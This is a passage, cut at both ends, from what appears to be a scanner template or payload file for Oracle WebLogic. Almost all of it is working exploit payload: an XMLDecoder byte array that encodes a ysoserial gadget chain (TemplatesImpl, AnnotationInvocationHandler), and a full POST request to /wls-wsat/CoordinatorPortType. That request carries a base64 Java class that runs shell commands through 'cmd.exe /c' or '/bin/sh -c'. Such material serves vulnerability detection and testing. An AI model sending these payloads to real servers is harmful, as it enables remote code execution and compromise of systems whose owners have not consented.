index=\"4345\"><byte>111</byte></void><void index=\"4346\"><byte>117</byte></void><void index=\"4347\"><byte>114</byte></void><void index=\"4348\"><byte>99</byte></void><void index=\"4349\"><byte>101</byte></void><void index=\"4350\"><byte>70</byte></void><void index=\"4351\"><byte>105</byte></void><void index=\"4352\"><byte>108</byte></void><void index=\"4353\"><byte>101</byte></void><void index=\"4354\"><byte>1</byte></void><void index=\"4355\"><byte>0</byte></void><void index=\"4356\"><byte>12</byte></void><void index=\"4357\"><byte>71</byte></void><void index=\"4358\"><byte>97</byte></void><void index=\"4359\"><byte>100</byte></void><void index=\"4360\"><byte>103</byte></void><void index=\"4361\"><byte>101</byte></void><void index=\"4362\"><byte>116</byte></void><void index=\"4363\"><byte>115</byte></void><void index=\"4364\"><byte>46</byte></void><void index=\"4365\"><byte>106</byte></void><void index=\"4366\"><byte>97</byte></void><void index=\"4367\"><byte>118</byte></void><void index=\"4368\"><byte>97</byte></void><void index=\"4369\"><byte>12</byte></void><void index=\"4370\"><byte>0</byte></void><void index=\"4371\"><byte>10</byte></void><void index=\"4372\"><byte>0</byte></void><void index=\"4373\"><byte>11</byte></void><void index=\"4374\"><byte>7</byte></void><void index=\"4375\"><byte>0</byte></void><void index=\"4376\"><byte>26</byte></void><void index=\"4377\"><byte>1</byte></void><void index=\"4378\"><byte>0</byte></void><void index=\"4379\"><byte>35</byte></void><void index=\"4380\"><byte>121</byte></void><void index=\"4381\"><byte>115</byte></void><void index=\"4382\"><byte>111</byte></void><void index=\"4383\"><byte>115</byte></void><void index=\"4384\"><byte>101</byte></void><void index=\"4385\"><byte>114</byte></void><void index=\"4386\"><byte>105</byte></void><void index=\"4387\"><byte>97</byte></void><void index=\"4388\"><byte>108</byte></void><void index=\"4389\"><byte>47</byte></void><void index=\"4390\"><byte>112</byte></void><void index=\"4391\"><byte>97</byte></void><void index=\"4392\"><byte>121</byte></void><void index=\"4393\"><byte>108</byte></void><void index=\"4394\"><byte>111</byte></void><void index=\"4395\"><byte>97</byte></void><void index=\"4396\"><byte>100</byte></void><void index=\"4397\"><byte>115</byte></void><void index=\"4398\"><byte>47</byte></void><void index=\"4399\"><byte>117</byte></void><void index=\"4400\"><byte>116</byte></void><void index=\"4401\"><byte>105</byte></void><void index=\"4402\"><byte>108</byte></void><void index=\"4403\"><byte>47</byte></void><void index=\"4404\"><byte>71</byte></void><void index=\"4405\"><byte>97</byte></void><void index=\"4406\"><byte>100</byte></void><void index=\"4407\"><byte>103</byte></void><void index=\"4408\"><byte>101</byte></void><void index=\"4409\"><byte>116</byte></void><void index=\"4410\"><byte>115</byte></void><void index=\"4411\"><byte>36</byte></void><void index=\"4412\"><byte>70</byte></void><void index=\"4413\"><byte>111</byte></void><void index=\"4414\"><byte>111</byte></void><void index=\"4415\"><byte>1</byte></void><void index=\"4416\"><byte>0</byte></void><void index=\"4417\"><byte>16</byte></void><void index=\"4418\"><byte>106</byte></void><void index=\"4419\"><byte>97</byte></void><void index=\"4420\"><byte>118</byte></void><void index=\"4421\"><byte>97</byte></void><void index=\"4422\"><byte>47</byte></void><void index=\"4423\"><byte>108</byte></void><void index=\"4424\"><byte>97</byte></void><void index=\"4425\"><byte>110</byte></void><void index=\"4426\"><byte>103</byte></void><void index=\"4427\"><byte>47</byte></void><void index=\"4428\"><byte>79</byte></void><void index=\"4429\"><byte>98</byte></void><void index=\"4430\"><byte>106</byte></void><void index=\"4431\"><byte>101</byte></void><void index=\"4432\"><byte>99</byte></void><void index=\"4433\"><byte>116</byte></void><void index=\"4434\"><byte>1</byte></void><void index=\"4435\"><byte>0</byte></void><void index=\"4436\"><byte>20</byte></void><void index=\"4437\"><byte>106</byte></void><void index=\"4438\"><byte>97</byte></void><void index=\"4439\"><byte>118</byte></void><void index=\"4440\"><byte>97</byte></void><void index=\"4441\"><byte>47</byte></void><void index=\"4442\"><byte>105</byte></void><void index=\"4443\"><byte>111</byte></void><void index=\"4444\"><byte>47</byte></void><void index=\"4445\"><byte>83</byte></void><void index=\"4446\"><byte>101</byte></void><void index=\"4447\"><byte>114</byte></void><void index=\"4448\"><byte>105</byte></void><void index=\"4449\"><byte>97</byte></void><void index=\"4450\"><byte>108</byte></void><void index=\"4451\"><byte>105</byte></void><void index=\"4452\"><byte>122</byte></void><void index=\"4453\"><byte>97</byte></void><void index=\"4454\"><byte>98</byte></void><void index=\"4455\"><byte>108</byte></void><void index=\"4456\"><byte>101</byte></void><void index=\"4457\"><byte>1</byte></void><void index=\"4458\"><byte>0</byte></void><void index=\"4459\"><byte>31</byte></void><void index=\"4460\"><byte>121</byte></void><void index=\"4461\"><byte>115</byte></void><void index=\"4462\"><byte>111</byte></void><void index=\"4463\"><byte>115</byte></void><void index=\"4464\"><byte>101</byte></void><void index=\"4465\"><byte>114</byte></void><void index=\"4466\"><byte>105</byte></void><void index=\"4467\"><byte>97</byte></void><void index=\"4468\"><byte>108</byte></void><void index=\"4469\"><byte>47</byte></void><void index=\"4470\"><byte>112</byte></void><void index=\"4471\"><byte>97</byte></void><void index=\"4472\"><byte>121</byte></void><void index=\"4473\"><byte>108</byte></void><void index=\"4474\"><byte>111</byte></void><void index=\"4475\"><byte>97</byte></void><void index=\"4476\"><byte>100</byte></void><void index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc